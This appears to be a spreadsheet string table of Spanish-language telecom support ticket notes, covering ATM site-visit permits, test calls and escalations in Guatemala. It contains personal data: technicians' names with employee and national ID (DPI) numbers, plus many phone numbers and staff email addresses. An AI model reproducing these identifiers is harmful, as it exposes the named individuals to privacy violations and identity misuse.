  <si>
    <t>CLIENTE RESPONDE Y SE LE BRINDAN LOS DATOS DEL PERSONAL SOLICITA VISITA EL DIA MARTES A LAS 10:00HRS
DE: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;
ENVIADO: SÁBADO, 11 DE JUNIO DE 2022 12:27
PARA: ERWIN CHOQUIN &lt;ECHOQUIN@5B.COM.GT&gt;; CARLOS ENRIQUE DE LEON &lt;CEDELEON@5B.COM.GT&gt;; MONITOREO FALLAS ATMS &lt;OPERADORES.ATM4@TAV.COM.GT&gt;; ORLANDO RAMIREZ &lt;ORAMIREZ@5B.COM.GT&gt;; DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; LUIS GALINDO &lt;LGALINDO@5B.COM.GT&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; ANTHONY GARCIA &lt;AGARCIA@5B.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; OPERADORES ATM TAVSA &lt;OPERADORES.ATM@TAV.COM.GT&gt;; EMERSON RENATTO ROBLES TORRES &lt;EMERSON.ROBLES@CLARO.COM.GT&gt;; DARLING ELISABET ALVAREZ IBOY &lt;DARLING.ALVAREZ@CLARO.COM.GT&gt;; ERWIN RAMIREZ &lt;ERWIN.RAMIREZ@TAV.COM.GT&gt;; OSCAR CASTILLO &lt;OSCAR.CASTILLO@TAV.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;
ASUNTO: RE: GESTIÓN DE PERMISOS PARA ATM0363 || F4524080 || 47500911T
BUENOS DIAS, MUCHAS GRACIAS,
LES COMPARTIMOS LOS DATOS DEL PERSONAL
WALTER BARRIOS       IBM  520339       DPI 2054013331101
GERBER DONIS            IBM  550149       DPI 2086696631101
LUIS CHOJOLAN           IBM  549369       DPI 1738904660914
JOSE JULIAN                 IBM 610004        DPI 2082737511106
RAUL GUZMAN            IBM 580104        DPI 2611629771109
CESAR TUCH                 IBM  731836      DPI 2052962891105
DE: ERWIN CHOQUIN &lt;ECHOQUIN@5B.COM.GT&gt;
ENVIADO: SÁBADO, 11 DE JUNIO DE 2022 11:55
PARA: CARLOS ENRIQUE DE LEON &lt;CEDELEON@5B.COM.GT&gt;; MONITOREO FALLAS ATMS &lt;OPERADORES.ATM4@TAV.COM.GT&gt;; CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; ORLANDO RAMIREZ &lt;ORAMIREZ@5B.COM.GT&gt;; DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; LUIS GALINDO &lt;LGALINDO@5B.COM.GT&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; ANTHONY GARCIA &lt;AGARCIA@5B.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; OPERADORES ATM TAVSA &lt;OPERADORES.ATM@TAV.COM.GT&gt;; EMERSON RENATTO ROBLES TORRES &lt;EMERSON.ROBLES@CLARO.COM.GT&gt;; DARLING ELISABET ALVAREZ IBOY &lt;DARLING.ALVAREZ@CLARO.COM.GT&gt;; ERWIN RAMIREZ &lt;ERWIN.RAMIREZ@TAV.COM.GT&gt;; OSCAR CASTILLO &lt;OSCAR.CASTILLO@TAV.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;
ASUNTO: RE: GESTIÓN DE PERMISOS PARA ATM0363 || F4524080 || 47500911T
BUENOS DIAS SEÑORES CLARO,
COORDINAR VISITA PARA EL DIA MARTE A LAS 10AM, INDICARNOS EL PERSONAL QUE ASISTIRÁ PARA SOLICITAR LOS PERMISOS
SALUDOS
ERWIN CHOQUIN¿
ANALISTA DE TELECOMUNICACIONES
PBX: 2420¿7200
EXT.
2416
42343886
FROM: CARLOS ENRIQUE DE LEON &lt;CEDELEON@5B.COM.GT&gt;</t>
  </si>
  <si>
    <t>SE TIENE CORREO DE CLIENTE
DE: ORLANDO RAMIREZ &lt;ORAMIREZ@5B.COM.GT&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 15:41
PARA: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; MONITOREO FALLAS ATMS &lt;OPERADORES.ATM4@TAV.COM.GT&gt;; LUIS GALINDO &lt;LGALINDO@5B.COM.GT&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; ANTHONY GARCIA &lt;AGARCIA@5B.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; OPERADORES ATM TAVSA &lt;OPERADORES.ATM@TAV.COM.GT&gt;; EMERSON RENATTO ROBLES TORRES &lt;EMERSON.ROBLES@CLARO.COM.GT&gt;; DARLING ELISABET ALVAREZ IBOY &lt;DARLING.ALVAREZ@CLARO.COM.GT&gt;; ERWIN RAMIREZ &lt;ERWIN.RAMIREZ@TAV.COM.GT&gt;; OSCAR.CASTILLO@TAV.COM.GT &lt;OSCAR.CASTILLO@TAV.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;
ASUNTO: RE: GESTIÓN DE PERMISOS PARA ATM0363 || F4524080 || 47500911T
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RESPONDE ORLANDO QUIEN COORDINA PERMISOS CON TAVSA Y QUEDA LA VISITA PARA MAÑANA SABADO A LAS 11:00 HRS
-ID 2001505171</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 24207212 CONTESTA EL SEÑOR PABLO INDICA QUE AUN NO CUENTA CON LOS PERMISOS AUN **
-ID 2001250291
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 24207212 CONTESTA EL SEÑOR PABLO INDICA QUE AUN NO CUENTA CON LOS PERMISOS QUE LOS ESTARA SOLICITANDO NUEVAMENTE **
-ID 2001192454 - 2001193493 - 2001193904
**</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL NO RESPONDE, SE INTENTARA LUEGO
-ID 3001129219 - 3001130346</t>
  </si>
  <si>
    <t>SE INTENTA CONTACTAR A CLIENTE 5B 24207212, PARA SOLICITAR LOS PERMISOS DE INGRESO DEBIDO A QUE SE HA ENVIADO MULTIPLES CORREO Y NO SE TIENE RESPUESTA.
3001120399
COLA:
NOMBRE: A: 24207210
NÚMERO: 24207210
DURACIÓN: 0:01:53
ESTADO: CONECTADA
DETALLES: 24207210
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: DIONICIO.VELIZ
FECHA Y HORA LOCALES: 30/05/2022 15:26:45</t>
  </si>
  <si>
    <t>A LA ESPERA QUE CLIENTE DE SEGUIMIENTO SEGUN LO INDICADO EN CORREO</t>
  </si>
  <si>
    <t>##SEGUIMIENTO VIERNES Y SABADO A LAS 11 AM ##</t>
  </si>
  <si>
    <t>SE REALIZARON HOY LLAMADAS DE PRUEBA -- NO SE ENCONTRO PERDIDA DE AUDIO- SE DARA SEGUIMIENTO EL DIA DE MAÑANA A LAS 11 AM CON PRUEBAS ## ACTUALMENTE A NIVEL DE CLARO TOD OOK- ##SERVICIO ESTA ACTIVO ## ESTO ES UNICMANETE SOPORTE HACIA CLIENTE</t>
  </si>
  <si>
    <t>SE HABLA CON GUADALUPE AL 23203434  Y AUDIO TRABAJA CON NORMALIDAD. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>SE HABLA CON KATHERINE OLIVA AL 23203434  Y AUDIO TRABAJA CON NORMALIDAD. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>SE HABLA CON ELVIS SAZO AL 23203434  Y AUDIO TRABAJA CON NORMALIDAD. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>SE HABLA CON PAOLA GOMEZ AL 23203434 Y AUDIO TRABAJA CON NORMALIDAD. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>DEBIDO A QUE EL CLIENTE INDICA QUE TIEE PROBLEMAS LOS VIENRES Y SABADO Y LA AFECTACION DURA 15 MINUTOS- HOY SE REALIZARON LLAMADAS DE PRUEBA- ##LLAMADAS SON EXITOSAS, NO SE OBSERVA PERDIDA DE AUDIO NI CORTE EN LLAMADAS ##
###LLMADAS COMPLETAN CON AUDIO
11:04 -- ANDREA LOSH
11:06 -- LUZ ARRECIA
11:14 -- ANDREA LOSH
##VIVO</t>
  </si>
  <si>
    <t>SE REALIZAN PRUEBAS: SE LLAMA AL 23203434 EN VARIAS OCACIONES Y LAS LLAMADAS COMPLETAN CON NORMALIDADA ## NO SE VE ANOMALIAS ##  A NIVEL DE CLARO TODO OK ##SI HAY AUDIO ## DEBIDO A QUE CLIENTE REPORTABA  PROBLEMAS ENLLAMDAS DE 11:00 A 11:15  LOS FINES DE SEMANA Y NO SE HAN TENNIDO INCONVENIENTES EN LAS PRUEBAS QUE SE HAN REALILZADO- ## ESTE CASO SIGUE COMO DE SOPORTE A CL
FECHA Y HORA LOCALES: 15/05/2022 11:03:10 AL 23203434 CONTESTA KATERINE---- &gt; LLAMADA OK-2001516881
FECHA Y HORA LOCALES: 15/05/2022 11:04:26 AL 23203434 CONTESTA ANDREA LOSCH---- &gt; LLAMADA OK-2001517149
FECHA Y HORA LOCALES: 15/05/2022 11:07:04 AL 23203434 CONTESTA BRYAN MUÑOZ ---- &gt; LLAMADA OK-2001517149
FECHA Y HORA LOCALES: 15/05/2022 11:11:21 AL 23203434 CONTESTA LUZ ARRECIS ---- &gt; LLAMADA OK-2001518140
FECHA Y HORA LOCALES: 15/05/2022 11:14:44 AL 23203434 CONTESTA WILSON RUIZ---- &gt; LLAMADA OK-2001518539</t>
  </si>
  <si>
    <t>GESTIÓN AE CONFIRMA SERVICIO OK HASTA EL MOMENTO, SE VOLVERÁN A REALIZAR PRUEBAS ESTE VIERNES 20 Y FIN DE SEMANA; SE LLAMÓ/HABLÓ CON HERBERTH CHÁVEZ/CLIENTE 31288921 Y SE LE INDICA LO DICHO POR GESTIÓN AE; ÉSTE CONFIRMA QUE TODO BIEN HASTA EL MOMENTO.</t>
  </si>
  <si>
    <t>F4536341</t>
  </si>
  <si>
    <t>### SE ESCALA VIA WEB ##
TICKET  4536341
CLIENTE  TRANSACCIONES Y TRANSFERENCIAS
DIRECCIÓN  PRINCIPAL CAJERO 2972 FARMACIA HERDEZ.- 3 AV. 6-01 ZONA 1 SANTA LUCIA COTZUMALGUAPA ESCUINTLA
ESCALACIÓN
COMERCIAL GT
TABLA DE ESCALAMIENTO PARA COMERCIAL GT
4/4	JOSE FERNANDO ROMERO	58260956	22 DÍAS 10 HORA		16:00:00
SUP GUSTAVO MARROQUIN CEL 58262789 CONFIRMA EN EL SECTOR AUN NO SE TIENEN PERMISOS POR  PARTE  DE LA MUNICIPALIDAD PARA ATENDER REPARACIONES DE SERVICIOS MASIVOS NI CORPORATIVOS, CASO SIGUE ESCALADO EN AREA JURIDICA CON LIC. LUIS GAYTAN, SERVICIO ACTIVO POR 3G REDUNDANCIA
TIEMPO TOTAL DE WORK 22 DÍAS 10 HORA  @JOSE ROMERO</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE SOLICITANDO LA VISITA TECNICA PARA EL DIA DE MAÑANA A LAS 09:00AM ESTAMOS EN LA ESPERA DE LOS ACCESOS
DE: JOSE ARTURO CORADO JIMENEZ
ENVIADO: LUNES, 13 DE JUNIO DE 2022 12:35
PARA: MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; FALLAS@5B.COM.GT &lt;FALLAS@5B.COM.GT&gt;; MONITOREO FALLAS ATMS &lt;OPERADORES.ATM4@TAV.COM.GT&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: GESTION DE PERMISOS || TRANSACCIONES Y TRANSFERENCIAS S.A. || 47502176T || CAJERO 2972 FARMACIA HERDEZ.- 3 AV. 6-01 ZONA 1 SANTA LUCIA COTZUMALGUAPA ESCUINTLA
BUENA TARDE
ESTIMADO CLIENTE POR ESTE MEDIO SOLCITO SU APOYO, PARA LA GESTIÓN DE PERMISOS NECESARIOS PARA PERSONAL TÉCNICO CON RESPECTO AL SERVICIO REPORTADO CON EL ID: "47502176T, UBICADO EN CAJERO 2972 FARMACIA HERDEZ. - 3 AV. 6-01 ZONA 1 SANTA LUCIA COTZUMALGUAPA ESCUINTLA  ADJUNTO DATOS DEL PERSONAL TÉCNICO, VISITA TÉCNICA PARA EL DÍA MARTES 14/06/2022 A LAS 09:00AM
 AXEL ZARPEC
QUEDAMOS ATENTOS A SUS COMENTARIOS
¡SALUDOS CORDIALES!</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  EDDY MENCIONA QUE EL ATM FUE RETIRADO, SE VALIDA SI CUENTA CON ALGUNA OT DE TRASLADO Y LA ULTIMA ES DEL 2018 Y ES UNA RENOVACION
CLIENTE INDICA QUE NO SE PUEDE COORDINAR VISITA PORQUE NO SE TIENE NINGUN ATM EN PR
-ID 3001026868</t>
  </si>
  <si>
    <t>SE LLAMA A EJECUTIVA DARLIN ALVAREZ 58261315 NO RESPONDE
-ID 3001079303
COLA:
NOMBRE: A: 58261315
NÚMERO: 58261315
DURACIÓN: 0:00:45
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 58261315
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ODALIS.SALAZAR
FECHA Y HORA LOCALES: 18/05/2022 09:01:14</t>
  </si>
  <si>
    <t>SE LLAMA A EJECUTIVO EMERSON ROBLES 58261439 MENCIONA QUE NO ES EL EJECUTIVO DE ESTE CLIENTE MENCIONA QUE LA EJECUTIVA ES DARLIN ALVAREZ 58261315
-ID 3001078050</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE ÁREA COMERCIAL CON LA SIGUIENTE INFORMACIÓN:
DE: DARLING ELISABET ALVAREZ IBOY [MAILTO:DARLING.ALVAREZ@CLARO.COM.GT]
ENVIADO EL: JUEVES, 2 DE JUNIO DE 2022 12:26
ASUNTO: RE: F4539605 -- 47501754T -- GRANADOS BAJA VERAPAZ PREVENTA 5424746
BUENOS DÍAS ESTIMADOS
ES UN GUSTO SALUDARLES,
LES COMENTO QUE EL CLIENTE ME INDICA QUE ESTE SERVICIO SE DARÁ DE BAJA EL PRÓXIMO MES POR RETIRO DEL CAJERO
ADJUNTO CORREO DEL CLIENTE.
QUEDO ATENTA A SUS COMENTARIOS.</t>
  </si>
  <si>
    <t>SE ESCALÓ CON EJECUTIVA CUENTA, EN TEL 58261421 CONTESTA REYNA YOL/EJECUTIVA; ME BRINDA EL TEL CORRECTO DE DARLING ALVAREZ/EJECUTIVA 58261315, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE; SE PIDE APOYO A CNOC CLARO VÍA SKYPE QUE NOS INCLUYAN EN LA COLA DE CORREOS.</t>
  </si>
  <si>
    <t>F4541879</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JAZMIN MAZARIEGOS 54196370  MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE BRINDA CONTACTO HEIDY 59612646
-ID 2001452329</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HEIDY 59612646 QUIEN QUEDA ENTERADA DE LA VISITA
-ID 2001452926</t>
  </si>
  <si>
    <t>F4546119</t>
  </si>
  <si>
    <t>CASO ESCALADO CON ÁREA COMERCIAL/OPERACIONES PARA TRABAJAR MIGRACIÓN EN EL SERVICIO, NO HAY ETA DEFINIDO.</t>
  </si>
  <si>
    <t>F4548026</t>
  </si>
  <si>
    <t>SE HABLÓ CON RODERICO DE LA CRUZ/CLIENTE 42150791 INDICA QUE REALIZARÁ SUS PRUEBAS INTERNAS; PIDE SE LE LLAME EN 35 MINUTOS PARA SEGUIMIENTO, ADICIONAL SE LE PIDE APOYO CONTESTANDO EL CORREO, INDICA QUE ASÍ LO HARÁ.</t>
  </si>
  <si>
    <t>F4548923</t>
  </si>
  <si>
    <t>SE ESTARA LLAMANDO A CLIENTE A LAS 14:00 HORAS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JACOBO QUIEN COMENTA QUE REVISO LOS EQUIPOS Y EL PROBLEMA ES QUE EL UPS YA NO FUNCIONA INDICA QUE CUANDO SE VA LA ENERGIA EL UPS YA NO RESISTE, INDICA QUE ESTARA HACIENDO EL REEMPLAZO EL PROXIMO MIERCOLES. CLIENTE SOLICITA LLAMADA EL PROXIMO MIERCOLES POR LA TARDE PARA SEGUIMIENTO, SE ADJUNTA IMAGEN DE LA LLAMADA.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JACOBO,  CLIENTE INDICA QUE ESTARA REVISANDO  EL SERVICIO, ASI MISMO SOLICITA LLAMADA EL DIA VIERNES A LAS 14 HORAS.  SE LE INDICA A CLIENTE SI PUEDEN VALIDAR SI LOS TRABAJOS EN EL PR YA TERMINARON O SI AUN CONTINUAN,   DE HABER TERMINADO SI PUEDEN REVISAR  QUE TANTO EL CPE COMO EL ETX ESTEN PROTEGIDOS CON UPS YA QUE EL ETX  TIENE REINICIOS CONSTANTES,  SI AUN NO HAN TERMINADO TRABAJOS DE VER SI ESTAN DESCONECTANDO EL ETX CONSTANTEMENTE.   CLIENTE INDICA QUE ESTARA REVISANDO Y DARA INFORMACION EL DIA VIERNES A LAS 14 HORAS.  SE QUEDA TT EN PC.</t>
  </si>
  <si>
    <t>-*  SE HABLA CON RODOLFO ESTRADA , INFORMA QUE VERIFICARÁ Y LO ENVIARÁ A LA BREVEDAD POSIBLE, SE SOLICITA APOYO A CNOC CON AGREGARNOS EN COPIA AL CORREO PARA PODER RECIBIR LA RESPUESTA -*
-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ AL 57081768 INDICA QUE YA ESTARA RESPONDIENDO EL CORREO CON LA FECHA Y HORA DE L AVISITA || SE NOTIFICA A GESTOR **
ID 1001177847
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANIBAL GONZALEZ AL 57081768 - 1720 EXT. 301690  NO RESPONDE</t>
  </si>
  <si>
    <t>SE VERIFICA COLA DE CORREOS NO SE OBSERVA RESPUESTA
8902323T // REDUNDANCIA.- MIXCO SN CRISTOBAL 5 AV. 3-05 SECTOR A-3 SAN CRISTOBAL 1 ZONA 8 MIXCO</t>
  </si>
  <si>
    <t>**** SE ENVÍA CORREO A CLIENTE, A LA ESPERA DE CONFIRMACIÓN DE VISITA ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: LUNES, 6 DE JUNIO DE 2022 8:07
PARA: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;; DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; MAYNOR ANIBAL LARIOS PEREZ &lt;MAYNOR.LARIOS@CLARO.COM.GT&gt;; SAUL GEUSSEPE SILIEZAR LOPEZ &lt;SAUL.SILIEZAR@CLARO.COM.GT&gt;; 'TIC GONZÁLEZ, ANIBAL' &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;; JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; 'TIC NAVAS, ESVIN' &lt;ESVIN.NAVAS@BANRURAL.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; 'TIC - DIRECCION DE TELECOMUNICACIONES (LISTA)' &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; MONITOREO.ENLACES@BANRURAL.COM.GT &lt;MONITOREO.ENLACES@BANRURAL.COM.GT&gt;; AGE705@MAILPRIVADO.BDR &lt;AGE705@MAILPRIVADO.BDR&gt;
ASUNTO: RE: 8902323T // REDUNDANCIA.- MIXCO SN CRISTOBAL 5 AV. 3-05 SECTOR A-3 SAN CRISTOBAL 1 ZONA 8 MIXCO
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO, NO SE HA TENIDO RESPUESTA ALGUNA RESPECTO A LA VISITA QUE SE HA ESTADO SOLICITADO POR MÁS DE 1 MES. FAVOR DE SU APOYO EN CONFIRMAR SI SERÁ POSIBLE REALIZAR TAL VISITA, O BIEN FAVOR DE APOYARNOS EN VALIDAR EL CIERRE DE CASO.
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ  AL 57081768 INDICA QUE YA RESPONDIO  CORREO CON AUTORIZACION DE ACCESOS **
ID 1001473793
**</t>
  </si>
  <si>
    <t>*** SE LOGRA CONVERSAR CON ANIBAL GONZALEZ, QUIEN INFORMA QUE SE LE LLAME EL DÍA JUEVES A LAS 14H PARA CONFIRMAR SI SE LOGRA PROCEDER CON LA VISITA EL DÍA VIERNES 10 A PRIMERA HORA ***</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 1720 EXT 301690 - 301645 NOSE LOGRA COMUNICACION  A NINGUNA EXT SE INTENTARA LUEGO **
ID 1001994969 - 1001996245
**</t>
  </si>
  <si>
    <t>*** SE ENVÍA CORREO A CLIENTE PARA QUE PUEDA APOYAR CON EL INGRESO, YA QUE NO SE TUVO RESPUESA POR LLAMADA (3 INTENTOS), SE QUEDA A LA ESPRA ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 8 DE JUNIO DE 2022 7:27
PARA: TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;; CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;; DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; MAYNOR ANIBAL LARIOS PEREZ &lt;MAYNOR.LARIOS@CLARO.COM.GT&gt;; SAUL GEUSSEPE SILIEZAR LOPEZ &lt;SAUL.SILIEZAR@CLARO.COM.GT&gt;; JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; TIC NAVAS, ESVIN &lt;ESVIN.NAVAS@BANRURAL.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; 'TIC - DIRECCION DE TELECOMUNICACIONES (LISTA)' &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; AGE705@BANRURAL.COM.GT &lt;AGE705@BANRURAL.COM.GT&gt;; MONITOREO.ENLACES@BANRURAL.COM.GT &lt;MONITOREO.ENLACES@BANRURAL.COM.GT&gt;; AGE705@MAILPRIVADO.BDR &lt;AGE705@MAILPRIVADO.BDR&gt;
ASUNTO: RE: 8902323T // REDUNDANCIA.- MIXCO SN CRISTOBAL 5 AV. 3-05 SECTOR A-3 SAN CRISTOBAL 1 ZONA 8 MIXCO
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO, COMENTO QUE PERSONAL TÉCNICO SE HA ECHO PRESENTE EL DÍA DE HOY A LA AGENCIA DESDE LAS 7H. SIN EMBARGO, NOS COMENTAN QUE NO HAY PERSONAL DE BANCO PARA QUE PUEDA DAR INGRESO. FAVOR DE SU APOYO CON EL SEGUIMIENTO Y AUTORIZACIÓN DE ACCESOS.
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>*** SE ENVÍA CORREO PARA UNA NUEVA COORDINACIÓN, A LA ESPERA DE QUE CENTRAL Y PUNTO REMOTO GESTIONEN ACCESOS CON EL COMERCIAL PARA VALIDAR ANTENA EN LA AZOTEA ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 8 DE JUNIO DE 2022 7:50
PARA: TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;; CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;; DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; MAYNOR ANIBAL LARIOS PEREZ &lt;MAYNOR.LARIOS@CLARO.COM.GT&gt;; SAUL GEUSSEPE SILIEZAR LOPEZ &lt;SAUL.SILIEZAR@CLARO.COM.GT&gt;; JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; TIC NAVAS, ESVIN &lt;ESVIN.NAVAS@BANRURAL.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; 'TIC - DIRECCION DE TELECOMUNICACIONES (LISTA)' &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; AGE705@BANRURAL.COM.GT &lt;AGE705@BANRURAL.COM.GT&gt;; MONITOREO.ENLACES@BANRURAL.COM.GT &lt;MONITOREO.ENLACES@BANRURAL.COM.GT&gt;; AGE705@MAILPRIVADO.BDR &lt;AGE705@MAILPRIVADO.BDR&gt;
ASUNTO: RE: 8902323T // REDUNDANCIA.- MIXCO SN CRISTOBAL 5 AV. 3-05 SECTOR A-3 SAN CRISTOBAL 1 ZONA 8 MIXCO
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DE LA FALLA REPORTADA, COMENTO QUE PERSONAL HA PROCEDIDO A RETIRARSE DE LAS INTALACIONES. YA QUE SE HA CONVERSADO CON NANCY DÍAZ DE PUNTO REMOTO, QUIEN INFORMA QUE AÚN NO SE TENÍA CONFIRMACIÓN DE ACCESOS PARA LA AZOTEA (PARA VALIDAR ANTENA). FAVOR DE SU APOYO CONFIRMANDO UNA NUEVA FECHA Y HORARIO PARA LA VISITA.
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ AL 57081768 NO RESPONDE | ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 1001966322
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ AL 57081768 NO RESPONDE | ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 1001959687
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ AL 57081768 NO RESPONDE | ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 1001981494
**</t>
  </si>
  <si>
    <t>*** SE TRATÓ DE CONTACTAR VÍA TELEFÓNICA CON ANIBAL GONZALEZ 57081768 Y VALIDAR EL ACCESO, SIN EMBARGO, NO SE LOGRA LA COMUNICACIÓN ***
1001900794
1001900820
1001900901</t>
  </si>
  <si>
    <t>*** SE HABLA CON NANCY DE PUNTO REMOTO 50002099 (ID 1001902242), COMENTA QUE NO HABÍA TENIDO CONFIRMACIÓN DE PARA EL INGRESO, Y POR ELLO NO HABÍA RESPONDIDO EL CORREO DE AUTORIZADO LOS ACCESOS. POR LO QUE SE REQUIERE RECOORDINAR NOS COMENTA . ***</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ AL 57081768 - 1720 EXT. 301690  NO RESPONDE | ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 1001959687
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ, AL 57081768  NO RESPONDE ENVIA A BUZON SE LLAMA AL 1720 EXT 301645 - 301690 TAMPOCO RESPONDE
ID 2001251564 - 2001251668
**</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL  PERO TAMPOCO RESPONDEN
-ID 2001267295</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANIBAL GONZALEZ 57081768 ENVIA A BUZON, SE INTENTARA LUEGO
-ID 2001266850 - 2001267002</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ AL 57081768 - 1720 EXT. 301690  NO RESPONDE | ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 1001385215 - 2001385343
**
**</t>
